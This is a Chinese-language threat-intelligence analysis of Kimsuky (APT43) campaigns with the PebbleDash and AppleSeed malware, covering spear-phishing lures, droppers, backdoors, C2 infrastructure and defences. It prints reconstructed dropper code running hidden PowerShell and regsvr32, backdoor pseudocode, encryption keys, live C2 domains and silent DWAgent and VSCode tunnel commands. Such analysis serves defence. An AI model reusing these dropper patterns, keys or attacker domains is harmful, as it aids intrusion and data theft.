摘要Kimsuky亦称 APT43、Ruby Sleet 等是活跃逾十年的朝鲜语系高级持续性威胁APT组织长期针对韩国及全球多国政府、国防、医疗等关键领域实施定向攻击。本文基于卡巴斯基 GReAT 团队 2026 年 5 月公开的最新攻击活动报告对 Kimsuky 近期依托 PebbleDash 与 AppleSeed 两大恶意软件集群开展的攻击行动进行全链路拆解系统分析其初始入侵、恶意代码部署、权限维持、横向渗透与数据窃取等关键环节的技术实现重点剖析 HelloDoor、httpMalice、MemLoad、httpTroy、AppleSeed、HappyDoor 等新型变种的核心功能、加密机制、通信协议与抗检测特性同时揭示该组织滥用 VSCode 远程隧道、DWAgent、Cloudflare 隧道等合法服务实现隐蔽控制的新型战术。研究表明Kimsuky 正持续迭代 PebbleDash 平台工具链引入 Rust 开发、大语言模型辅助编码、合法远程工具劫持等新技术攻击隐蔽性与破坏力显著提升。反网络钓鱼技术专家芦笛指出Kimsuky 高度依赖鱼叉式钓鱼邮件与社会工程学实现初始接入其恶意附件伪装与诱饵文件构造高度贴合目标行业场景传统边界防护极易失效。本文结合代码片段与攻击实例还原攻击流程提出针对性检测与防御建议为关键信息基础设施应对 APT 组织持续威胁提供技术参考。1 引言高级持续性威胁APT已成为全球网络空间安全的核心威胁其具备目标明确、周期漫长、手段隐蔽、技术迭代快等特征对政府、国防、能源、医疗等关键行业构成严重安全风险。Kimsuky 作为典型朝鲜语系 APT 组织自 2013 年被卡巴斯基首次公开报道以来长期聚焦韩国及周边国家战略目标依托自研恶意代码与社会工程学手段实施持续性情报窃取活动。与 Lazarus 等技术能力突出的朝鲜语系 APT 组织相比Kimsuky 早期以定制化鱼叉钓鱼、简易远控木马为核心手段技术复杂度相对较低但近年来呈现明显的战术升级与工具链迭代趋势。2026 年 5 月卡巴斯基 GReAT 团队发布的报告显示Kimsuky 正深度复用并改造源自 Lazarus 组织的 PebbleDash 恶意平台推出基于 Rust 语言的 HelloDoor、最新变种 httpMalice 等新型后门同时持续优化 AppleSeed 家族组件形成 PebbleDash 与 AppleSeed 两大技术集群并行的攻击体系。该组织突破传统恶意代码开发模式引入大语言模型辅助编码、合法软件隧道穿透、开源远控工具劫持等新型战术大幅降低攻击特征暴露风险提升纵向渗透与横向控制能力。现有针对 Kimsuky 的研究多聚焦单一恶意样本或局部攻击环节缺乏对最新工具链、战术协同与全流程技术细节的系统性剖析。本文以 2025—2026 年 Kimsuky 最新攻击活动为研究对象基于原始攻击报告还原完整杀伤链对恶意代码功能、加密算法、通信协议、权限维持机制、C2 基础设施特征进行深度解析结合代码示例与攻击实例验证技术细节揭示该组织战术演进规律与技术发展趋势为网络安全防御体系建设提供实证支撑。反网络钓鱼技术专家芦笛强调APT 组织的初始接入成功率直接决定攻击成效Kimsuky 依托高度仿真的行业文档诱饵、多格式下载器与社会工程学诱导实现对目标终端的无感知入侵防御方必须构建覆盖邮件检测、终端防护、行为分析的立体化反钓鱼与反入侵体系。2 Kimsuky 组织背景与攻击活动概况2.1 组织基本信息与归因特征Kimsuky 是国际安全社区公认的长期活跃 APT 组织拥有多个别名标识包括 APT43、Ruby Sleet、Black Banshee、Sparkling Pisces、Velvet Chollima、Springtail 等该组织以朝鲜语为主要沟通语言攻击目标高度聚焦韩国政府机构、国防军工、医疗健康、科研教育等领域同时逐步拓展至巴西、德国等国家的国防相关实体具备明确的战略情报窃取动机。卡巴斯基、Mandiant、微软等多家安全厂商的追踪数据显示Kimsuky 至少自 2013 年起持续开展攻击活动早期技术能力有限以定制化鱼叉钓鱼邮件、JSE 脚本下载器、基础远控木马为核心手段工具库包括 PebbleDash、BabyShark、AppleSeed、RandomQuery 等自研恶意代码同时复用 xRAT、XenoRAT、TutRAT 等开源远控工具。2021 年起该组织全面接管并改造 PebbleDash 平台逐步形成技术成熟、迭代迅速的两大恶意软件集群成为其核心攻击能力支撑。归因证据显示PebbleDash 与 AppleSeed 两大集群存在明确的技术关联二者共享 JSE、PIF、SCR、EXE 等多格式下载器、使用相同被盗韩国机构数字证书规避检测、采用一致的互斥体Mutex设计模式、目标行业与基础设施高度重叠上述特征证实两大集群由同一主体控制属于 Kimsuky 组织内部不同攻击模块。2.2 近期攻击活动整体特征2025—2026 年Kimsuky 攻击活动呈现三大显著趋势工具链专业化以 PebbleDash 平台为核心推出 Rust 编写的 HelloDoor、功能增强型 httpMalice、内存加载器 MemLoad、远控后门 httpTroy以 AppleSeed 为分支迭代 HappyDoor 变种形成覆盖下载、加载、远控、数据窃取的完整工具链。战术隐蔽化滥用 VSCode 远程隧道、Cloudflare Quick Tunnels、Ngrok 等合法隧道服务隐藏 C2 通信劫持 DWAgent 开源远程管理工具实现后渗透控制降低恶意流量特征暴露。技术现代化首次引入 Rust 语言开发恶意代码利用大语言模型生成调试注释优化加密算法与权限维持机制提升抗检测与持久化能力。攻击目标方面PebbleDash 集群侧重国防、军工、医疗行业已波及巴西、德国等境外目标AppleSeed 集群聚焦韩国政府机构重点窃取 GPKI 数字证书等敏感身份凭证。攻击基础设施高度依赖韩国免费域名托管服务同时入侵合法韩国网站作为中继节点结合隧道技术实现 C2 隐匿。3 初始接入技术与攻击载体分析3.1 鱼叉钓鱼邮件与社会工程学诱导Kimsuky 初始接入以鱼叉式钓鱼邮件为核心手段辅以即时通信工具定向接触核心逻辑是通过高度仿真的诱饵文件诱导目标用户执行恶意代码。反网络钓鱼技术专家芦笛指出该组织钓鱼邮件具备极强的针对性诱饵文件名、内容格式、行文风格完全贴合目标岗位与行业场景可有效绕过邮件网关与人工判别。钓鱼邮件附件通常为压缩包内含伪装成合法文档的恶意下载器文件命名直接映射邮件主题常见伪装类型包括政府公文类个人信息处理申请书、公共服务管理系统现场检查证据等教育招生类2026 年上半年国内大学院硕士委托教育选拔文件等安全通知类安全检测报告、系统更新说明等个人文档类姓名标注 PDF 文档、私人照片等。上述诱饵文件通过双重伪装规避检测外层为 HWP、PDF 等常见文档后缀内层追加 JSE、SCR、PIF 等可执行后缀例如[별지 제8호서식] 개인정보 요구서.hwp.jse用户仅可见外层合法后缀极易误触发执行。3.2 多格式下载器技术实现Kimsuky 使用 JSE、PIF、SCR、EXE 等多种下载器格式核心功能为释放诱饵文件、解密并执行恶意载荷不同格式下载器技术细节存在差异。3.2.1 JSE 下载器JSE 下载器是 Kimsuky 最常用的攻击载体基于 JScript 开发内置至少两段 Base64 编码数据块一段为无害诱饵文件另一段为恶意载荷部分样本包含冗余无效数据块干扰分析。核心执行流程解码 Base64 数据块将诱饵文件与恶意载荷写入C:\ProgramData等系统目录文件名随机生成格式为[7位随机字符].[4位随机字符]立即打开诱饵文件迷惑用户调用powershell.exe -windowstyle hidden certutil -decode完成二次 Base64 解码通过regsvr32.exe /s或rundll32.exe执行恶意载荷。典型代码片段示例// Base64解码诱饵文件与恶意载荷var lureData Base64Decode(lureBlob);var malwareData Base64Decode(malwareBlob);// 写入系统目录var fso new ActiveXObject(Scripting.FileSystemObject);var randName GetRandomName(7).GetRandomName(4);var malwarePath C:\\ProgramData\\ randName;// 执行二次解码与加载var cmd powershell -windowstyle hidden certutil -decode \malwarePath\ \malwarePath.dat\;ExecCmd(cmd);ExecCmd(regsvr32 /s \malwarePath.dat\);3.2.2 Reger DropperSCR 格式SCR 格式的 Reger 下载器采用XOR 加密保护内部数据内置固定密钥#RsfsetraW#EsfesgsgAJOPj4eml;同时包含诱饵文件与恶意载荷。执行后释放文件至%temp%或C:\ProgramData通过regsvr32.exe加载运行。3.2.3 Pidoc DropperPIF 格式PIF 格式的 Pidoc 下载器使用单字节 0xFF 异或加密代码全程插入垃圾数据与加密字符串混淆释放流程与 Reger 下载器一致主要用于投递 HappyDoor 等 AppleSeed 家族组件。3.3 初始接入防御要点反网络钓鱼技术专家芦笛强调针对 Kimsuky 初始接入的防御应聚焦三点一是邮件网关深度解析附件结构识别双重后缀伪装二是终端限制 JSE、PIF、SCR 等敏感格式脚本的自动执行权限三是开展员工钓鱼意识培训提升对政府公文、招生通知类高仿真诱饵的识别能力。4 核心恶意代码技术深度分析Kimsuky 当前恶意代码分为PebbleDash与AppleSeed两大集群前者为远程控制主力后者侧重数据窃取二者均具备持久化、C2 通信、指令执行、权限维持等核心能力。4.1 PebbleDash 集群恶意代码4.1.1 HelloDoor首个 Rust 编写的 PebbleDash 变种HelloDoor 是 Kimsuky 首个基于Rust 语言开发的 DLL 后门2025 年 8 月首次发现功能相对简洁处于早期开发阶段但标志着该组织开始采用内存安全型语言提升抗逆向与抗检测能力。核心技术特征持久化机制写入注册表HKCU\Software\Microsoft\Windows\CurrentVersion\Run键名tdll执行命令regsvr32.exe /s [当前路径]。C2 通信基于 Cloudflare TryCloudflare 临时隧道域名female-disorder-beta-metropolitan.trycloudflare.comHTTP 协议通信隧道无需账号注册基础设施难以溯源。端口绑定高权限进程绑定 5555 端口普通权限绑定 5554 端口。唯一标识采集 MAC 地址、计算机名、系统版本生成哈希作为设备唯一标识。加密协议指令采用 RC4 加密密钥fwr3errsettwererfs通信参数格式固定为aaaaaaaaaa2bbbbbbbbbb[UID]cccccccccc1。指令集支持目录切换、延时、安装持久化、命令执行等基础功能。关键代码逻辑示例Rust 伪代码// 生成设备唯一标识let uid hash(mac_addr computer_name windows);// RC4解密指令let rc4_key bfwr3errsettwererfs;let cmd rc4_decrypt(base64_decode(resp_data), rc4_key);// 执行系统命令match cmd {mcd set_current_dir(param),msleep sleep(param.parse().unwrap()),install add_registry_run(),_ exec_cmd(cmd),}特殊特征代码注释包含 Emoji 表情语法存在拼写错误如decrytion、autorum证实由大语言模型辅助生成为 APT 组织首次公开使用 LLM 辅助恶意开发的典型案例。4.1.2 httpMalice最新 PebbleDash 后门变种httpMalice 是 2025 年 12 月出现的成熟型 PebbleDash 后门分为 1.8Dropbox 通信与 1.9HTTP/HTTPS 通信两个版本功能全面是当前 Kimsuky 主力远控工具。核心技术特征唯一标识UID由系统盘卷序列号8 位 权限状态组合而成权限状态 0SYSTEM 高权限、1 管理员权限、2 普通权限。持久化高权限创建 Windows 服务CacheDB执行rundll32.exe [路径], load普通权限写入注册表HKCU\Run键名Everything 1.9a-[文件大小]。编码特性执行命令前调用chcp 949切换韩语 EUC-KR 编码明确指向韩语用户环境。加密算法采用ChaCha20Base64加密传输数据密钥与随机数源自缓冲区指针地址每次运行动态变化解密难度高。通信模式基于m参数区分操作模式共 13 种模式覆盖状态上报、指令请求、数据回传、截屏、目录归档等功能。通信 URL 格式示例plaintextm13u[卷序列号]_[权限标识]d[ChaCha20加密Base64编码数据]指令集支持命令执行、文件下载、目录上传、截屏、内存加载、自卸载、休眠等完整远控功能可满足后渗透全流程需求。4.1.3 MemLoad 与 httpTroyMemLoad 是内存加载器V2/V3 版本自 2025 年广泛使用核心功能为抗 VM 检测、权限判断、载荷下载与内存反射加载避免恶意文件落地触发终端检测。执行流程创建随机命名.dat.cfg标记文件尝试写入C:\Windows\system32判断权限生成A-管理员或U-普通开头的 ID创建计划任务ChromeCheck高权限或EdgeCheck普通权限实现持久化以 Bearer Token 方式请求 C2 载荷使用固定 RC4 密钥解密反射加载载荷并调用hello导出函数。MemLoad 加载的核心载荷为httpTroy 后门用于长期驻留与数据窃取采用 NTFS 交换数据流ADS隐藏标记文件C2 服务器为file.bigcloud.n-e.kr。4.2 AppleSeed 集群恶意代码4.2.1 AppleSeed 2.1AppleSeed 自 2019 年出现当前主流版本为 2.1感染链包含两个下载器 安装器 主程序分为下载型与间谍型两个分支。核心功能下载型接收 C2 指令下载执行额外载荷间谍型窃取文档、截屏、键盘记录、USB 设备列表新增窃取C:\GPKI目录下韩国政府数字证书功能用于伪造合法身份。4.2.2 HappyDoorHappyDoor 是 AppleSeed 衍生变种2024 年由 AhnLab 首次披露与 AppleSeed 共享字符串混淆算法、数据类型、RSA 加密机制判断为 AppleSeed 高级进化版本主要通过 Pidoc 下载器投递隐蔽性更强。4.3 恶意代码技术总结PebbleDash 集群以远程控制为核心具备成熟的 C2 通信、持久化、指令执行、内存加载能力AppleSeed 集群以数据窃取为核心重点获取敏感文件与数字证书。两大集群共享加密算法、下载器格式、持久化逻辑、被盗证书技术协同性极高。反网络钓鱼技术专家芦笛指出Kimsuky 恶意代码呈现轻量化、无文件化、合法工具化趋势大量采用内存加载、隧道通信、脚本混淆技术传统基于特征码的杀毒软件检出率极低必须依托行为分析、内存检测、流量异常识别实现有效防御。5 后渗透阶段战术与合法工具劫持分析Kimsuky 在获取初始权限后采用合法工具劫持实现隐蔽后渗透核心使用 VSCode 远程隧道与 DWAgent 远程管理工具规避传统恶意远控流量检测。5.1 VSCode 远程隧道滥用VSCode Remote Tunneling 是微软官方提供的合法远程开发功能支持通过浏览器或 VSCode 客户端远程访问终端Kimsuky 将其改造为隐蔽远控通道实现无恶意代码远程控制。5.1.1 JSE 脚本部署模式JSE 下载器自动下载 VSCode CLI通过 GitHub 账号静默认证创建名为bizeugene的隧道将隧道 URL 与设备码发送至入侵的韩国合法网站攻击者通过 GitHub 账号登录隧道实现远程控制。关键命令示例bash运行code tunnel --name bizeugene脚本通过echo |模拟回车自动选择 GitHub 认证方式将输出重定向至out.txt监控到隧道 URL 后通过 POST 请求回传。5.1.2 Go 语言安装器模式新型 Go 语言编写的vscode_payload安装器功能更完善支持自动化隧道创建下载并解压 VSCode CLI 至C:\Users\Public模拟键盘输入选择 GitHub 认证自动获取设备码并完成授权将隧道 URL 发送至 Slack WebHook同时发送心跳包攻击者通过浏览器或 VSCode 接入隧道。该模式完全基于合法软件与服务流量特征与正常开发行为一致极难检测。5.2 DWAgent 远程管理工具劫持DWAgent 是开源远程管理工具被大量 APT 与勒索软件组织滥用。Kimsuky 通过两种方式部署直接下发压缩包至已入侵终端使用类 Reger 下载器的专用安装器RC4 解密释放1.zip与unrar.exe自动安装DWService系统服务。安装器核心命令cmdc:\programdata\unrar.exe x C:\programdata\1.zip C:\programdata\c:\programdata\dwagent\native\dwagsvc.exe installServicec:\programdata\dwagent\native\dwagsvc.exe startService攻击者预置config.json配置文件绑定自有账号实现开机自启与长期隐蔽控制流量经过 DWAgent 官方中继服务器无法通过 IP 黑名单拦截。5.3 后渗透战术价值反网络钓鱼技术专家芦笛强调合法工具劫持是 APT 组织后渗透的主流趋势VSCode、DWAgent 等工具具备合法签名、正常业务流量、官方服务器中继等特征可穿透防火墙、入侵检测系统IDS、终端检测与响应EDR等多层防御实现 “隐身控制”。6 C2 基础设施与攻击溯源特征6.1 域名与服务器特征Kimsuky 长期依赖韩国免费域名托管服务naedomain.hankook注册大量.p-e.kr、.o-r.kr、.n-e.kr、.r-e.kr等次级域名用于 PebbleDash 与 AppleSeed 集群 C2 服务器部署服务器多指向 InterServer 旗下 VPS。同时该组织频繁入侵韩国合法网站搭建中继节点用于接收 VSCode 隧道信息、中转 C2 流量降低主服务器暴露风险。6.2 隧道技术隐匿PebbleDash 集群大量使用Cloudflare Quick Tunnels、VSCode Tunneling、Ngrok等临时隧道服务无需独立服务器与域名可快速切换接入点基础设施追踪难度极大。6.3 溯源关键标识归因核心证据包括两大集群共享下载器格式、加密算法、互斥体、被盗证书目标高度聚焦韩国政府、国防领域符合 Kimsuky 传统攻击模式PebbleDash 自 2021 年起仅在 Kimsuky 攻击中出现与微软定义的 Ruby Sleet、Mandiant 定义的 APT43 技术特征完全匹配。7 攻击防御策略与技术建议结合 Kimsuky 全攻击链路特征提出分层防御策略7.1 初始接入防御邮件网关检测双重后缀、JSE/SCR/PIF 敏感格式、Base64 编码脚本、韩语高仿真诱饵终端防护限制 JScript、VBScript 等脚本执行权限启用应用白名单意识培训针对政府公文、招生通知、安全报告类钓鱼场景专项演练。7.2 恶意代码防御内存检测监控regsvr32、rundll32无参加载、异常写入注册表 Run 键、计划任务静默创建加密流量检测识别 Cloudflare 隧道、VSCode 隧道、DWAgent 异常外联行为恶意代码特征监控C:\GPKI目录访问、ChaCha20/RC4 异常加密、固定 C2 域名通信。7.3 后渗透防御限制 VSCode CLI、DWAgent 等工具非授权安装与运行监控 GitHub 账号异常认证、code tunnel 命令执行、Slack WebHook 异常外连启用终端日志审计记录远程桌面、隧道服务、系统服务安装行为。反网络钓鱼技术专家芦笛强调防御 Kimsuky 类 APT 攻击必须放弃单一依赖特征库的传统思路构建 “邮件检测 终端防护 流量分析 威胁狩猎” 的闭环体系重点关注合法工具滥用、无文件攻击、隧道通信等新型战术。8 结论Kimsuky 作为长期活跃的朝鲜语系 APT 组织2025—2026 年攻击活动呈现明显的技术升级、战术隐蔽、工具专业化趋势。本文基于最新攻击报告对该组织依托 PebbleDash 与 AppleSeed 两大集群的攻击流程、恶意代码、后渗透战术、基础设施进行全维度拆解证实其已完成对 PebbleDash 平台的深度改造推出 Rust 语言后门、LLM 辅助开发、合法隧道劫持等新型能力攻击隐蔽性与持续性显著提升。研究表明Kimsuky 攻击杀伤链高度闭环以高仿真鱼叉钓鱼实现初始接入以多格式下载器释放恶意载荷以 PebbleDash/AppleSeed 实现持久化远控与数据窃取以 VSCode/DWAgent 实现隐蔽后渗透以免费域名与隧道服务隐匿 C2 基础设施形成覆盖入侵、控制、渗透、窃取的完整攻击体系。反网络钓鱼技术专家芦笛指出APT 组织的技术迭代速度持续快于防御体系建设Kimsuky 对 Rust、LLM、合法远程工具的应用代表了未来 APT 攻击的发展方向防御方必须加强威胁情报联动、行为检测技术落地、应急响应能力提升实现对高级威胁的早发现、早阻断、早清除。本文局限在于仅基于公开报告开展静态与动态分析未获取完整源码与 C2 后台数据未来可结合沙箱联动、内存取证、流量回溯进一步挖掘攻击细节。随着 Kimsuky 持续迭代工具链针对其新型变种、跨平台攻击、AI 辅助攻击的追踪与防御仍将是长期研究重点。编辑芦笛公共互联网反网络钓鱼工作组